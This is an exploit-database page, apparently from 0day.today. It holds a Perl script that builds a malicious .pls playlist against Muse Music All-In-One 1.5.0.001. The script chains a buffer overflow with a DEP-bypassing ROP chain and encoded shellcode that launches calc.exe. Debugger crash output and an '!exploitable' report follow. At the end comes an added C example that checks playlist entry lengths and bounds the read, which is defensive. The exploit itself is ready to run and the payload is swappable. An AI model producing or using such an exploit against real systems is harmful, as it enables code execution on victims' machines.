0day.today - Biggest Exploit Database in the World.
Muse Music All-In-One 1.5.0.001 .pls File Buffer Overflow (DEP Bypass)
#!/usr/bin/perl
#
#[+]Exploit Title: Muse Music All-In-One PLS File Buffer Overflow Exploit (DEP Bypass)
#[+]Date: 25\09\2011 (DD\MM\YYYY)
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/Muse-Music-All-In-One/3000-2141_4-10070288.html
#[+]Version: 1.5.0.001
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#[+]Info:
#This exploit can be universal if the buffer needed to overwrite EIP stays the same on all Windows systems. ;)
#To reproduce, click File -> Open... -> select Exploit.pls and see Calc.
#
use strict;
use warnings;

print q{
Created By C4SS!0 G0M3S
E-mail netfuzzer@hotmail.com
Blog net-fuzzer.blogspot.com
};
print "\n\t\t[+]Creating Exploit File...\n";
sleep(2);

##########################ROP START HERE###############################################
my $rop = pack('V',0x0043bc93);   # POP EAX # RETN
$rop .= "AAAA" x 4;               # JUNK
$rop .= pack('V',0x00339014);     # PTR to a Call DWORD for LoadLibraryA
$rop .= pack('V',0x1002042f);     # POP EBP # RETN
$rop .= pack('V',0x0044387e);     # ADD ESP,40 # RETN == Return of LoadLibraryA
$rop .= pack('V',0x100255d1);     # POP ESI # RETN
$rop .= pack('V',0x003367C1);     # JMP [EAX] // Jump to [DWORD EAX] == LoadLibraryA
$rop .= pack('V',0x004a296b);     # POP EDI # RETN
$rop .= pack('V',0x004a296c);     # RETN
$rop .= pack('V',0x004b0519);     # PUSHAD # RETN
$rop .= "kernel32.dll\x00";
$rop .= "A" x 35;                 # JUNK
#############################Call GetProcAddress###################################
$rop .= pack('V',0x004b2507);     # XCHG EAX,EBX # RETN
$rop .= pack('V',0x004a296b);     # POP EDI # RETN
$rop .= pack('V',0x003367C1);     # JMP [EAX] // Jump to [DWORD EAX] == GetProcAddress
$rop .= pack('V',0x100255d1);     # POP ESI # RETN
$rop .= pack('V',0x0044387e);     # ADD ESP,40 # RETN == Return of GetProcAddress
$rop .= pack('V',0x004b2507);     # XCHG EAX,EBX # RETN
$rop .= pack('V',0x004b9563);     # XCHG EAX,EBP # RETN
$rop .= pack('V',0x0043bc93);     # POP EAX # RETN
$rop .= pack('V',0x00339010);     # PTR to GetProcAddress
$rop .= pack('V',0x004a296b);     # POP EDI # RETN
$rop .= pack('V',0x003367C1);     # JMP [EAX] // Jump to [DWORD EAX] == GetProcAddress
$rop .= pack('V',0x004b0519);     # PUSHAD # RETN
$rop .= "VirtualProtect\x00";
$rop .= "A" x 33;                 # JUNK
#############################Call VirtualProtect####################################
$rop .= pack('V',0x004b2507);     # XCHG EAX,EBX # RETN
$rop .= pack('V',0x00432a42);     # PUSH ESP # POP EDI # XOR EAX,EAX # POP ESI # RETN 08
$rop .= "VVVV";                   # JUNK
$rop .= pack('V',0x004a296c) x 3; # RETN
$rop .= pack('V',0x10018000);     # XOR EAX,EAX # RETN
$rop .= pack('V',0x0043bc93);     # POP EAX # RETN
$rop .= pack('V',0x00000040);     # Value of flNewProtect
$rop .= pack('V',0x00478695);     # XCHG EAX,EDX # RETN
$rop .= pack('V',0x10018000);     # XOR EAX,EAX # RETN
$rop .= pack('V',0x1001433f);     # ADD EAX,EDI # POP EDI # POP ESI # RETN
$rop .= "A" x 8;                  # JUNK
$rop .= pack('V',0x1002028b);     # POP ECX # RETN
$rop .= "\x00\x00\x00\x00";
$rop .= pack('V',0x1000B6ED);     # ADD ECX,EAX # MOV DWORD PTR DS:[10085B38],ECX # RETN
$rop .= pack('V',0x004b2507);     # XCHG EAX,EBX # RETN
$rop .= pack('V',0x1002042f);     # POP EBP # RETN
$rop .= pack('V',0x10012107);     # PUSH ESP # RETN == Return of VirtualProtect
$rop .= pack('V',0x004a05b8);     # POP EBX # RETN
$rop .= pack('V',0x00000500);     # Value of dwSize
$rop .= pack('V',0x004b2c56);     # XCHG EAX,ESI # RETN
$rop .= pack('V',0x004a296b);     # POP EDI # RETN
$rop .= pack('V',0x004a296c);     # RETN
$rop .= pack('V',0x004b0519);     # PUSHAD # RETN
##########################ROP END HERE#################################################

my $shellcode =
"\xb8\x4b\xaf\x2d\x0e\xda\xde\xd9\x74\x24\xf4\x5b\x29\xc9" .
"\xb1\x32\x83\xeb\xfc\x31\x43\x0e\x03\x08\xa1\xcf\xfb\x72" .
"\x55\x86\x04\x8a\xa6\xf9\x8d\x6f\x97\x2b\xe9\xe4\x8a\xfb" .
"\x79\xa8\x26\x77\x2f\x58\xbc\xf5\xf8\x6f\x75\xb3\xde\x5e" .
"\x86\x75\xdf\x0c\x44\x17\xa3\x4e\x99\xf7\x9a\x81\xec\xf6" .
"\xdb\xff\x1f\xaa\xb4\x74\x8d\x5b\xb0\xc8\x0e\x5d\x16\x47" .
"\x2e\x25\x13\x97\xdb\x9f\x1a\xc7\x74\xab\x55\xff\xff\xf3" .
"\x45\xfe\x2c\xe0\xba\x49\x58\xd3\x49\x48\x88\x2d\xb1\x7b" . # Shellcode Winexec "Calc.exe"
"\xf4\xe2\x8c\xb4\xf9\xfb\xc9\x72\xe2\x89\x21\x81\x9f\x89" . # Bad chars "\x00\x20\x3d\x0a\x0d\xff"
"\xf1\xf8\x7b\x1f\xe4\x5a\x0f\x87\xcc\x5b\xdc\x5e\x86\x57" .
"\xa9\x15\xc0\x7b\x2c\xf9\x7a\x87\xa5\xfc\xac\x0e\xfd\xda" .
"\x68\x4b\xa5\x43\x28\x31\x08\x7b\x2a\x9d\xf5\xd9\x20\x0f" .
"\xe1\x58\x6b\x45\xf4\xe9\x11\x20\xf6\xf1\x19\x02\x9f\xc0" .
"\x92\xcd\xd8\xdc\x70\xaa\x17\x97\xd9\x9a\xbf\x7e\x88\x9f" .
"\xdd\x80\x66\xe3\xdb\x02\x83\x9b\x1f\x1a\xe6\x9e\x64\x9c" .
"\x1a\xd2\xf5\x49\x1d\x41\xf5\x5b\x7e\x04\x65\x07\x81";

my $buf = "A" x 1300;
$buf .= $rop;
$buf .= "\x90" x 10;
$buf .= $shellcode;
$buf .= "A" x 2000;

open(my $file, ">Exploit.pls") or die "[-]Error: $!\n";
print $file $buf;
close $file;
print "\t\t[+]File Exploit.pls Created Successfully.\n";
sleep(1);

=pod

(8f4.8f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000041 ebx=0000007b ecx=ffffffff edx=00000002 esi=00130000 edi=77c3fce0
eip=77c24609 esp=0012ea1c ebp=0012ec34 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll -
msvcrt!wscanf+0x2343:
77c24609 8806            mov     byte ptr [esi],al          ds:0023:00130000=41
0:000> .exr -1
ExceptionAddress: 77c24609 (msvcrt!wscanf+0x00002343)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 00130000
Attempt to write to address 00130000
0:000> .lastevent
Last event: 8f4.8f8: Access violation - code c0000005 (first chance)
  debugger time: Sun Sep 25 19:22:13.937 2011 (UTC - 3:00)
0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0012ec34 77c212df msvcrt!wscanf+0x2343
*** WARNING: Unable to verify checksum for Muse.exe
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for Muse.exe -
0012ec70 00498d3a msvcrt!fscanf+0x28
0012eca4 7c91a3cb Muse!CSdll::operator=+0x974fa
0012ecb8 7c91a351 ntdll!RtlpUnWaitCriticalSection+0x86c
00000000 00000000 ntdll!RtlpUnWaitCriticalSection+0x7f2
0:000> g
(8f4.8f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000
eip=41414141 esp=0012e64c ebp=0012e66c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
41414141 ??              ???
0:000> !load winext/msec.dll
0:000> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x41414141
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Read Access Violation
Exception Hash (Major/Minor): 0x71174239.0x2a6b1069
Stack Trace:
Unknown
ntdll!RtlConvertUlongToLargeInteger+0x6a
ntdll!RtlConvertUlongToLargeInteger+0x3c
ntdll!KiUserExceptionDispatcher+0xe
msvcrt!fscanf+0x28
Muse!CSdll::operator=+0x974fa
ntdll!RtlpUnWaitCriticalSection+0x86c
ntdll!RtlpUnWaitCriticalSection+0x7f2
Instruction Address: 0x0000000041414141
Description: Read Access Violation at the Instruction Pointer
Short Description: ReadAVonIP
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Read Access Violation at the Instruction Pointer starting at Unknown Symbol @ 0x0000000041414141 called from ntdll!RtlConvertUlongToLargeInteger+0x000000000000006a (Hash=0x71174239.0x2a6b1069)
Access violations at the instruction pointer are exploitable if not near NULL.

=cut

# 0day.today [2024-12-23] #
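The WinDbg output above places the first fault inside msvcrt!fscanf (a byte store of 0x41 at an address past the end of a buffer, with the caller in Muse.exe), which is the footprint of a scanf-family read of a playlist field into a fixed-size buffer with no width limit. The following C is an added example, not part of the original exploit and not Muse's code: the defensive side of that bug class, a pre-check that flags .pls entries longer than an assumed limit and a reader whose conversion width is derived from its destination buffer, so an overlong value is truncated rather than written past the buffer. The limit PLS_VALUE_MAX, the two sample playlists and all function names are constructed for this example.

```c
#include <stdio.h>
#include <string.h>

/* Assumed for this example: a fixed value-buffer size a playlist parser
 * might use; any real limit would come from the application. */
#define PLS_VALUE_MAX 260

/* Constructed benign playlist (not taken from the page). */
static const char BENIGN_PLS[] =
    "[playlist]\n"
    "File1=C:\\Music\\track01.mp3\n"
    "Title1=Track One\n"
    "File2=C:\\Music\\track02.mp3\n"
    "NumberOfEntries=2\n";

/* Constructed malformed playlist: one File value of 4000 'A' bytes, far
 * longer than any real path. Built at runtime to keep the source short. */
static char g_oversized_pls[4200];
const char *pls_oversized_sample(void)
{
    size_t n = (size_t)snprintf(g_oversized_pls, sizeof g_oversized_pls,
                                "[playlist]\nFile1=");
    memset(g_oversized_pls + n, 'A', 4000);
    n += 4000;
    snprintf(g_oversized_pls + n, sizeof g_oversized_pls - n,
             "\nNumberOfEntries=1\n");
    return g_oversized_pls;
}

/* Pre-check: count key=value lines whose value exceeds `limit` bytes.
 * A non-zero result is the signal to refuse the file before it reaches
 * any fixed-buffer parsing code. */
int pls_count_oversized(const char *text, size_t limit)
{
    int oversized = 0;
    const char *p = text;
    while (*p) {
        const char *eol = strchr(p, '\n');
        size_t len = eol ? (size_t)(eol - p) : strlen(p);
        const char *eq = memchr(p, '=', len);
        if (eq) {
            size_t vlen = len - (size_t)(eq + 1 - p);
            if (vlen > limit)
                oversized++;
        }
        if (!eol)
            break;
        p = eol + 1;
    }
    return oversized;
}

/* Hardened extraction of the first "FileN=" value. An unbounded conversion
 * such as sscanf(line, "File%*d=%s", out) writes as many bytes as the line
 * holds; here the width is derived from `cap`, so `out` receives at most
 * cap-1 bytes plus the terminator and an overlong value is truncated.
 * Returns 1 if a File entry was found, 0 otherwise (out is then ""). */
int pls_first_file_entry(const char *text, char *out, size_t cap)
{
    char fmt[32];
    /* e.g. cap=64 yields the format "File%*d=%63[^\r\n]" */
    snprintf(fmt, sizeof fmt, "File%%*d=%%%zu[^\r\n]", cap - 1);
    const char *p = text;
    while (*p) {
        if (sscanf(p, fmt, out) == 1)
            return 1;
        const char *eol = strchr(p, '\n');
        if (!eol)
            break;
        p = eol + 1;
    }
    out[0] = '\0';
    return 0;
}

int main(void)
{
    char path[64];
    printf("benign: oversized=%d\n",
           pls_count_oversized(BENIGN_PLS, PLS_VALUE_MAX));
    printf("malformed: oversized=%d\n",
           pls_count_oversized(pls_oversized_sample(), PLS_VALUE_MAX));
    if (pls_first_file_entry(pls_oversized_sample(), path, sizeof path))
        printf("truncated File1 length: %zu\n", strlen(path));
    return 0;
}
```

The pre-check and the bounded reader are independent layers: the first lets a file be rejected (and logged) before parsing, the second guarantees that even a file which slips through cannot write beyond the destination buffer. Keeping the width tied to `cap` instead of a hard-coded literal means the two cannot drift apart when the buffer size changes.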